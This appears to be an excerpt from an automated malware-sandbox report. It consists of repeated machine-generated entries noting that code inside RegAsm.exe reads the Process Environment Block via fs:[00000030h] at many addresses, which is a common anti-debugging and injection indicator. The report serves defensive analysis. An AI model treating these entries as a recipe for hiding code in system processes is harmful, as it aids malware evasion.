Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030B9148 mov eax, dword ptr fs:[00000030h] 6_2_030B9148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030B9148 mov eax, dword ptr fs:[00000030h] 6_2_030B9148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030B9148 mov eax, dword ptr fs:[00000030h] 6_2_030B9148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03195152 mov eax, dword ptr fs:[00000030h] 6_2_03195152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03154144 mov eax, dword ptr fs:[00000030h] 6_2_03154144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03154144 mov eax, dword ptr fs:[00000030h] 6_2_03154144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03154144 mov ecx, dword ptr fs:[00000030h] 6_2_03154144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03154144 mov eax, dword ptr fs:[00000030h] 6_2_03154144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03154144 mov eax, dword ptr fs:[00000030h] 6_2_03154144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C6154 mov eax, dword ptr fs:[00000030h] 6_2_030C6154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C6154 mov eax, dword ptr fs:[00000030h] 6_2_030C6154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BC156 mov eax, dword ptr fs:[00000030h] 6_2_030BC156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C7152 mov eax, dword ptr fs:[00000030h] 6_2_030C7152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03159179 mov eax, dword ptr fs:[00000030h] 6_2_03159179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF172 mov eax, dword ptr fs:[00000030h] 6_2_030BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF172 mov eax, dword ptr fs:[00000030h] 6_2_030BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF172 mov eax, dword ptr fs:[00000030h] 6_2_030BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF172 mov eax, dword ptr fs:[00000030h] 6_2_030BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF172 mov eax, dword ptr fs:[00000030h] 6_2_030BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF172 mov eax, dword ptr fs:[00000030h] 6_2_030BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF172 mov eax, dword ptr fs:[00000030h] 6_2_030BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF172 mov eax, dword ptr fs:[00000030h] 6_2_030BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF172 mov eax, dword ptr fs:[00000030h] 6_2_030BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF172 mov eax, dword ptr fs:[00000030h] 6_2_030BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF172 mov eax, dword ptr fs:[00000030h] 6_2_030BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF172 mov eax, dword ptr fs:[00000030h] 6_2_030BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF172 mov eax, dword ptr fs:[00000030h] 6_2_030BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF172 mov eax, dword ptr fs:[00000030h] 6_2_030BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF172 mov eax, dword ptr fs:[00000030h] 6_2_030BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF172 mov eax, dword ptr fs:[00000030h] 6_2_030BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF172 mov eax, dword ptr fs:[00000030h] 6_2_030BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF172 mov eax, dword ptr fs:[00000030h] 6_2_030BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF172 mov eax, dword ptr fs:[00000030h] 6_2_030BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF172 mov eax, dword ptr fs:[00000030h] 6_2_030BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF172 mov eax, dword ptr fs:[00000030h] 6_2_030BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03117190 mov eax, dword ptr fs:[00000030h] 6_2_03117190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0314019F mov eax, dword ptr fs:[00000030h] 6_2_0314019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0314019F mov eax, dword ptr fs:[00000030h] 6_2_0314019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0314019F mov eax, dword ptr fs:[00000030h] 6_2_0314019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0314019F mov eax, dword ptr fs:[00000030h] 6_2_0314019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03100185 mov eax, dword ptr fs:[00000030h] 6_2_03100185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BA197 mov eax, dword ptr fs:[00000030h] 6_2_030BA197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BA197 mov eax, dword ptr fs:[00000030h] 6_2_030BA197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BA197 mov eax, dword ptr fs:[00000030h] 6_2_030BA197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0317C188 mov eax, dword ptr fs:[00000030h] 6_2_0317C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0317C188 mov eax, dword ptr fs:[00000030h] 6_2_0317C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031711A4 mov eax, dword ptr fs:[00000030h] 6_2_031711A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031711A4 mov eax, dword ptr fs:[00000030h] 6_2_031711A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031711A4 mov eax, dword ptr fs:[00000030h] 6_2_031711A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031711A4 mov eax, dword ptr fs:[00000030h] 6_2_031711A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030DB1B0 mov eax, dword ptr fs:[00000030h] 6_2_030DB1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0313E1D0 mov eax, dword ptr fs:[00000030h] 6_2_0313E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0313E1D0 mov eax, dword ptr fs:[00000030h] 6_2_0313E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0313E1D0 mov ecx, dword ptr fs:[00000030h] 6_2_0313E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0313E1D0 mov eax, dword ptr fs:[00000030h] 6_2_0313E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0313E1D0 mov eax, dword ptr fs:[00000030h] 6_2_0313E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031951CB mov eax, dword ptr fs:[00000030h] 6_2_031951CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031861C3 mov eax, dword ptr fs:[00000030h] 6_2_031861C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031861C3 mov eax, dword ptr fs:[00000030h] 6_2_031861C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030FD1D0 mov eax, dword ptr fs:[00000030h] 6_2_030FD1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030FD1D0 mov ecx, dword ptr fs:[00000030h] 6_2_030FD1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030E51EF mov eax, dword ptr fs:[00000030h] 6_2_030E51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030E51EF mov eax, dword ptr fs:[00000030h] 6_2_030E51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030E51EF mov eax, dword ptr fs:[00000030h] 6_2_030E51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030E51EF mov eax, dword ptr fs:[00000030h] 6_2_030E51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030E51EF mov eax, dword ptr fs:[00000030h] 6_2_030E51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030E51EF mov eax, dword ptr fs:[00000030h] 6_2_030E51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030E51EF mov eax, dword ptr fs:[00000030h] 6_2_030E51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030E51EF mov eax, dword ptr fs:[00000030h] 6_2_030E51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030E51EF mov eax, dword ptr fs:[00000030h] 6_2_030E51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030E51EF mov eax, dword ptr fs:[00000030h] 6_2_030E51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030E51EF mov eax, dword ptr fs:[00000030h] 6_2_030E51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030E51EF mov eax, dword ptr fs:[00000030h] 6_2_030E51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030E51EF mov eax, dword ptr fs:[00000030h] 6_2_030E51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C51ED mov eax, dword ptr fs:[00000030h] 6_2_030C51ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030F01F8 mov eax, dword ptr fs:[00000030h] 6_2_030F01F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031961E5 mov eax, dword ptr fs:[00000030h] 6_2_031961E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03144000 mov ecx, dword ptr fs:[00000030h] 6_2_03144000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030DE016 mov eax, dword ptr fs:[00000030h] 6_2_030DE016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030DE016 mov eax, dword ptr fs:[00000030h] 6_2_030DE016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030DE016 mov eax, dword ptr fs:[00000030h] 6_2_030DE016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030DE016 mov eax, dword ptr fs:[00000030h] 6_2_030DE016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0318903E mov eax, dword ptr fs:[00000030h] 6_2_0318903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0318903E mov eax, dword ptr fs:[00000030h] 6_2_0318903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0318903E mov eax, dword ptr fs:[00000030h] 6_2_0318903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0318903E mov eax, dword ptr fs:[00000030h] 6_2_0318903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BA020 mov eax, dword ptr fs:[00000030h] 6_2_030BA020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BC020 mov eax, dword ptr fs:[00000030h] 6_2_030BC020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0316705E mov ebx, dword ptr fs:[00000030h] 6_2_0316705E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0316705E mov eax, dword ptr fs:[00000030h] 6_2_0316705E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C2050 mov eax, dword ptr fs:[00000030h] 6_2_030C2050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030EB052 mov eax, dword ptr fs:[00000030h] 6_2_030EB052
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0313D070 mov ecx, dword ptr fs:[00000030h] 6_2_0313D070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03195060 mov eax, dword ptr fs:[00000030h] 6_2_03195060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0314106E mov eax, dword ptr fs:[00000030h] 6_2_0314106E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D1070 mov eax, dword ptr fs:[00000030h] 6_2_030D1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D1070 mov ecx, dword ptr fs:[00000030h] 6_2_030D1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D1070 mov eax, dword ptr fs:[00000030h] 6_2_030D1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D1070 mov eax, dword ptr fs:[00000030h] 6_2_030D1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D1070 mov eax, dword ptr fs:[00000030h] 6_2_030D1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D1070 mov eax, dword ptr fs:[00000030h] 6_2_030D1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D1070 mov eax, dword ptr fs:[00000030h] 6_2_030D1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D1070 mov eax, dword ptr fs:[00000030h] 6_2_030D1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D1070 mov eax, dword ptr fs:[00000030h] 6_2_030D1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D1070 mov eax, dword ptr fs:[00000030h] 6_2_030D1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D1070 mov eax, dword ptr fs:[00000030h] 6_2_030D1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D1070 mov eax, dword ptr fs:[00000030h] 6_2_030D1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D1070 mov eax, dword ptr fs:[00000030h] 6_2_030D1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030EC073 mov eax, dword ptr fs:[00000030h] 6_2_030EC073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C208A mov eax, dword ptr fs:[00000030h] 6_2_030C208A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BD08D mov eax, dword ptr fs:[00000030h] 6_2_030BD08D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030F909C mov eax, dword ptr fs:[00000030h] 6_2_030F909C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C5096 mov eax, dword ptr fs:[00000030h] 6_2_030C5096
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030ED090 mov eax, dword ptr fs:[00000030h] 6_2_030ED090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030ED090 mov eax, dword ptr fs:[00000030h] 6_2_030ED090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031860B8 mov eax, dword ptr fs:[00000030h] 6_2_031860B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031860B8 mov ecx, dword ptr fs:[00000030h] 6_2_031860B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031950D9 mov eax, dword ptr fs:[00000030h] 6_2_031950D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031420DE mov eax, dword ptr fs:[00000030h] 6_2_031420DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D70C0 mov eax, dword ptr fs:[00000030h] 6_2_030D70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D70C0 mov ecx, dword ptr fs:[00000030h] 6_2_030D70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D70C0 mov ecx, dword ptr fs:[00000030h] 6_2_030D70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D70C0 mov eax, dword ptr fs:[00000030h] 6_2_030D70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D70C0 mov ecx, dword ptr fs:[00000030h] 6_2_030D70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D70C0 mov ecx, dword ptr fs:[00000030h] 6_2_030D70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D70C0 mov eax, dword ptr fs:[00000030h] 6_2_030D70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D70C0 mov eax, dword ptr fs:[00000030h] 6_2_030D70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D70C0 mov eax, dword ptr fs:[00000030h] 6_2_030D70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D70C0 mov eax, dword ptr fs:[00000030h] 6_2_030D70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D70C0 mov eax, dword ptr fs:[00000030h] 6_2_030D70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D70C0 mov eax, dword ptr fs:[00000030h] 6_2_030D70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D70C0 mov eax, dword ptr fs:[00000030h] 6_2_030D70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D70C0 mov eax, dword ptr fs:[00000030h] 6_2_030D70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D70C0 mov eax, dword ptr fs:[00000030h] 6_2_030D70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D70C0 mov eax, dword ptr fs:[00000030h] 6_2_030D70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D70C0 mov eax, dword ptr fs:[00000030h] 6_2_030D70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D70C0 mov eax, dword ptr fs:[00000030h] 6_2_030D70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0313D0C0 mov eax, dword ptr fs:[00000030h] 6_2_0313D0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0313D0C0 mov eax, dword ptr fs:[00000030h] 6_2_0313D0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030E90DB mov eax, dword ptr fs:[00000030h] 6_2_030E90DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031020F0 mov ecx, dword ptr fs:[00000030h] 6_2_031020F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C80E9 mov eax, dword ptr fs:[00000030h] 6_2_030C80E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BA0E3 mov ecx, dword ptr fs:[00000030h] 6_2_030BA0E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030E50E4 mov eax, dword ptr fs:[00000030h] 6_2_030E50E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030E50E4 mov ecx, dword ptr fs:[00000030h] 6_2_030E50E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BC0F0 mov eax, dword ptr fs:[00000030h] 6_2_030BC0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C5702 mov eax, dword ptr fs:[00000030h] 6_2_030C5702
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C5702 mov eax, dword ptr fs:[00000030h] 6_2_030C5702
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C7703 mov eax, dword ptr fs:[00000030h] 6_2_030C7703
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030FC700 mov eax, dword ptr fs:[00000030h] 6_2_030FC700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030FF71F mov eax, dword ptr fs:[00000030h] 6_2_030FF71F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030FF71F mov eax, dword ptr fs:[00000030h] 6_2_030FF71F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C0710 mov eax, dword ptr fs:[00000030h] 6_2_030C0710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030F0710 mov eax, dword ptr fs:[00000030h] 6_2_030F0710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0313C730 mov eax, dword ptr fs:[00000030h] 6_2_0313C730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0319B73C mov eax, dword ptr fs:[00000030h] 6_2_0319B73C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0319B73C mov eax, dword ptr fs:[00000030h] 6_2_0319B73C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0319B73C mov eax, dword ptr fs:[00000030h] 6_2_0319B73C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0319B73C mov eax, dword ptr fs:[00000030h] 6_2_0319B73C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C3720 mov eax, dword ptr fs:[00000030h] 6_2_030C3720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030DF720 mov eax, dword ptr fs:[00000030h] 6_2_030DF720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030DF720 mov eax, dword ptr fs:[00000030h] 6_2_030DF720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030DF720 mov eax, dword ptr fs:[00000030h] 6_2_030DF720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030FC720 mov eax, dword ptr fs:[00000030h] 6_2_030FC720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030FC720 mov eax, dword ptr fs:[00000030h] 6_2_030FC720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030F273C mov eax, dword ptr fs:[00000030h] 6_2_030F273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030F273C mov ecx, dword ptr fs:[00000030h] 6_2_030F273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030F273C mov eax, dword ptr fs:[00000030h] 6_2_030F273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0318972B mov eax, dword ptr fs:[00000030h] 6_2_0318972B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C973A mov eax, dword ptr fs:[00000030h] 6_2_030C973A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C973A mov eax, dword ptr fs:[00000030h] 6_2_030C973A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0317F72E mov eax, dword ptr fs:[00000030h] 6_2_0317F72E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030B9730 mov eax, dword ptr fs:[00000030h] 6_2_030B9730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030B9730 mov eax, dword ptr fs:[00000030h] 6_2_030B9730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030F5734 mov eax, dword ptr fs:[00000030h] 6_2_030F5734
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102750 mov eax, dword ptr fs:[00000030h] 6_2_03102750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102750 mov eax, dword ptr fs:[00000030h] 6_2_03102750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03144755 mov eax, dword ptr fs:[00000030h] 6_2_03144755
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030F674D mov esi, dword ptr fs:[00000030h] 6_2_030F674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030F674D mov eax, dword ptr fs:[00000030h] 6_2_030F674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030F674D mov eax, dword ptr fs:[00000030h] 6_2_030F674D
